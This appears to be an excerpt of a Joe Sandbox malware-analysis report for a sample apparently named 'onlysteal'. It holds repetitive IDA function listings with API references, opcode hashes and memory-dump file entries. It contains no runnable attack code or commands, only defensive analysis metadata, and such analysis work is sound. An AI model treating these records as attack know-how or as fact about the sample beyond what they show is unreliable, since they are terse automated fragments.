                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: $
                                      • API String ID: 1269201914-2716087259
                                      • Opcode ID: 7b8932ca71bbf6eb9f7ccb637412cf9e8da5f40b123b358e88a596f2d6182804
                                      • Instruction ID: 01db35723957d7ec7966efed214bc12b2adda0e41fee21763b394be309b6e273
                                      • Opcode Fuzzy Hash: 7b8932ca71bbf6eb9f7ccb637412cf9e8da5f40b123b358e88a596f2d6182804
                                      • Instruction Fuzzy Hash: 18A001E62B9142BC3A4C72526D46C3B061EE4CAB61372892EF85BD4491A9907CA519B1
                                      Function 0024E2A5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E1E3
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: $
                                      • API String ID: 1269201914-2716087259
                                      • Opcode ID: 4b6f21feb63cecda4339b34d6d0d9309e413629fdd85d44011eadb0abd6f8f6f
                                      • Instruction ID: 01db35723957d7ec7966efed214bc12b2adda0e41fee21763b394be309b6e273
                                      • Opcode Fuzzy Hash: 4b6f21feb63cecda4339b34d6d0d9309e413629fdd85d44011eadb0abd6f8f6f
                                      • Instruction Fuzzy Hash: 18A001E62B9142BC3A4C72526D46C3B061EE4CAB61372892EF85BD4491A9907CA519B1
                                      Function 0024E2AF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E1E3
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: $
                                      • API String ID: 1269201914-2716087259
                                      • Opcode ID: 2fd684c7c218f807da83b2d112242582d3172980b6a209dac5b91586281976ad
                                      • Instruction ID: 01db35723957d7ec7966efed214bc12b2adda0e41fee21763b394be309b6e273
                                      • Opcode Fuzzy Hash: 2fd684c7c218f807da83b2d112242582d3172980b6a209dac5b91586281976ad
                                      • Instruction Fuzzy Hash: 18A001E62B9142BC3A4C72526D46C3B061EE4CAB61372892EF85BD4491A9907CA519B1
                                      Function 0024E2B9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E1E3
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: $
                                      • API String ID: 1269201914-2716087259
                                      • Opcode ID: e23c7692d2cae979064a646863a9d38c91bc543075c96f257870506797e312bc
                                      • Instruction ID: 01db35723957d7ec7966efed214bc12b2adda0e41fee21763b394be309b6e273
                                      • Opcode Fuzzy Hash: e23c7692d2cae979064a646863a9d38c91bc543075c96f257870506797e312bc
                                      • Instruction Fuzzy Hash: 18A001E62B9142BC3A4C72526D46C3B061EE4CAB61372892EF85BD4491A9907CA519B1
                                      Function 0024E291 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E1E3
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: $
                                      • API String ID: 1269201914-2716087259
                                      • Opcode ID: eedc9b4f466175d3793b548da8c84f6e9f7834b2a332a40cb8658e28d1eb7fd9
                                      • Instruction ID: 01db35723957d7ec7966efed214bc12b2adda0e41fee21763b394be309b6e273
                                      • Opcode Fuzzy Hash: eedc9b4f466175d3793b548da8c84f6e9f7834b2a332a40cb8658e28d1eb7fd9
                                      • Instruction Fuzzy Hash: 18A001E62B9142BC3A4C72526D46C3B061EE4CAB61372892EF85BD4491A9907CA519B1
                                      Function 0024E29B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E1E3
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: $
                                      • API String ID: 1269201914-2716087259
                                      • Opcode ID: 2b46e64fe1bbad4432a8355aa89db02c50f470f6c0b6f914a6d0bf10aa718e76
                                      • Instruction ID: 01db35723957d7ec7966efed214bc12b2adda0e41fee21763b394be309b6e273
                                      • Opcode Fuzzy Hash: 2b46e64fe1bbad4432a8355aa89db02c50f470f6c0b6f914a6d0bf10aa718e76
                                      • Instruction Fuzzy Hash: 18A001E62B9142BC3A4C72526D46C3B061EE4CAB61372892EF85BD4491A9907CA519B1
                                      Function 0024E2C3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E1E3
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: $
                                      • API String ID: 1269201914-2716087259
                                      • Opcode ID: 551920bf7e5df81ac680e965f5a9f74bc3e8bc7d13bb21d118e822972dafca28
                                      • Instruction ID: 01db35723957d7ec7966efed214bc12b2adda0e41fee21763b394be309b6e273
                                      • Opcode Fuzzy Hash: 551920bf7e5df81ac680e965f5a9f74bc3e8bc7d13bb21d118e822972dafca28
                                      • Instruction Fuzzy Hash: 18A001E62B9142BC3A4C72526D46C3B061EE4CAB61372892EF85BD4491A9907CA519B1
                                      Function 0024E2CD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E1E3
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: $
                                      • API String ID: 1269201914-2716087259
                                      • Opcode ID: a46ee7adde0c0906ba94b41b882dc3dd2a05f25f5a813c0c5fe0d567d0a435bd
                                      • Instruction ID: 01db35723957d7ec7966efed214bc12b2adda0e41fee21763b394be309b6e273
                                      • Opcode Fuzzy Hash: a46ee7adde0c0906ba94b41b882dc3dd2a05f25f5a813c0c5fe0d567d0a435bd
                                      • Instruction Fuzzy Hash: 18A001E62B9142BC3A4C72526D46C3B061EE4CAB61372892EF85BD4491A9907CA519B1
                                      Function 0024E2D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E1E3
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: $
                                      • API String ID: 1269201914-2716087259
                                      • Opcode ID: 52fffd512962b5ad3c104abcfa6479424681b03c72d4344349e2d24241521673
                                      • Instruction ID: 01db35723957d7ec7966efed214bc12b2adda0e41fee21763b394be309b6e273
                                      • Opcode Fuzzy Hash: 52fffd512962b5ad3c104abcfa6479424681b03c72d4344349e2d24241521673
                                      • Instruction Fuzzy Hash: 18A001E62B9142BC3A4C72526D46C3B061EE4CAB61372892EF85BD4491A9907CA519B1
                                      Function 0024E569 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E51F
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: ($
                                      • API String ID: 1269201914-451235775
                                      • Opcode ID: 04b388bc270d4d75ed1671a1ca634cbd1de7fd6a9c06899d89d527faabda00dd
                                      • Instruction ID: 1f9b3b679d3ca1a0e623f5cbd68435956c768cbc7ab0ae103ad011d9b391cbae
                                      • Opcode Fuzzy Hash: 04b388bc270d4d75ed1671a1ca634cbd1de7fd6a9c06899d89d527faabda00dd
                                      • Instruction Fuzzy Hash: ADA011C2AB8002BC3E0C3202AC02C3B020EE8C2F203B2882EF80280080A8800CA00832
                                      Function 0024E541 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E51F
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: ($
                                      • API String ID: 1269201914-451235775
                                      • Opcode ID: f760c6b715ec9efbc49cafc82ae41b7d55a7c0077b7616d20ecf75b1a797322e
                                      • Instruction ID: 1f9b3b679d3ca1a0e623f5cbd68435956c768cbc7ab0ae103ad011d9b391cbae
                                      • Opcode Fuzzy Hash: f760c6b715ec9efbc49cafc82ae41b7d55a7c0077b7616d20ecf75b1a797322e
                                      • Instruction Fuzzy Hash: ADA011C2AB8002BC3E0C3202AC02C3B020EE8C2F203B2882EF80280080A8800CA00832
                                      Function 0024E555 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E51F
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: ($
                                      • API String ID: 1269201914-451235775
                                      • Opcode ID: b36c3596790e8ba8059d5d92c5b183e32c8539e0741ba0a2a9cd87a1065660a7
                                      • Instruction ID: 1f9b3b679d3ca1a0e623f5cbd68435956c768cbc7ab0ae103ad011d9b391cbae
                                      • Opcode Fuzzy Hash: b36c3596790e8ba8059d5d92c5b183e32c8539e0741ba0a2a9cd87a1065660a7
                                      • Instruction Fuzzy Hash: ADA011C2AB8002BC3E0C3202AC02C3B020EE8C2F203B2882EF80280080A8800CA00832
                                      Function 0024E55F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0024E51F
                                        • Part of subcall function 0024E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0024E8D0
                                        • Part of subcall function 0024E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0024E8E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID: ($
                                      • API String ID: 1269201914-451235775
                                      • Opcode ID: 9d7abdb7ad36649dbe607f26fb2269db737de093751854976ab7682b62d762ba
                                      • Instruction ID: 1f9b3b679d3ca1a0e623f5cbd68435956c768cbc7ab0ae103ad011d9b391cbae
                                      • Opcode Fuzzy Hash: 9d7abdb7ad36649dbe607f26fb2269db737de093751854976ab7682b62d762ba
                                      • Instruction Fuzzy Hash: ADA011C2AB8002BC3E0C3202AC02C3B020EE8C2F203B2882EF80280080A8800CA00832
                                      Function 0025BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0025B7BB: GetOEMCP.KERNEL32(00000000,?,?,0025BA44,?), ref: 0025B7E6
                                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0025BA89,?,00000000), ref: 0025BC64
                                      • GetCPInfo.KERNEL32(00000000,0025BA89,?,?,?,0025BA89,?,00000000), ref: 0025BC77
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: CodeInfoPageValid
                                      • String ID:
                                      • API String ID: 546120528-0
                                      • Opcode ID: d087e665658b0aaf839ccedd291d2b3814bf8f15729bd38ca134bd5448467078
                                      • Instruction ID: 4ebf055c1fe104a0904834851f16e1b7985a7ae98ee9357251eefacaf5cf5fa5
                                      • Opcode Fuzzy Hash: d087e665658b0aaf839ccedd291d2b3814bf8f15729bd38ca134bd5448467078
                                      • Instruction Fuzzy Hash: E45173709202469EDB26CF31C8856BAFBF4EF41302F28446EDC928B251D7759929CB98
                                      Function 00239A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00239A50,?,?,00000000,?,?,00238CBC,?), ref: 00239BAB
                                      • GetLastError.KERNEL32(?,00000000,00238411,-00009570,00000000,000007F3), ref: 00239BB6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ErrorFileLastPointer
                                      • String ID:
                                      • API String ID: 2976181284-0
                                      • Opcode ID: e36255f88bdb410988086ef1a4a5b93b339418f9627b58ba36430403b737b94d
                                      • Instruction ID: f0ac61d01fa4cf23bd6f33c8ca805ff9be2b6916a43b9c2ca380fe5bdf0381dc
                                      • Opcode Fuzzy Hash: e36255f88bdb410988086ef1a4a5b93b339418f9627b58ba36430403b737b94d
                                      • Instruction Fuzzy Hash: EE41C0B16243028FDB24DF19E58456AF7EAFFD6324F148A2DE88183260D7F0ED958B51
                                      Function 00231E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00231E55
                                        • Part of subcall function 00233BBA: __EH_prolog.LIBCMT ref: 00233BBF
                                      • _wcslen.LIBCMT ref: 00231EFD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: H_prolog$_wcslen
                                      • String ID:
                                      • API String ID: 2838827086-0
                                      • Opcode ID: 115df40709ae37743bd43f9554f0957e93424ef26a586cdf72f7a654ae572435
                                      • Instruction ID: 2b4c23400022399a1a9f53a18eed581506a86bbf6da132a74c92ffb464f1563f
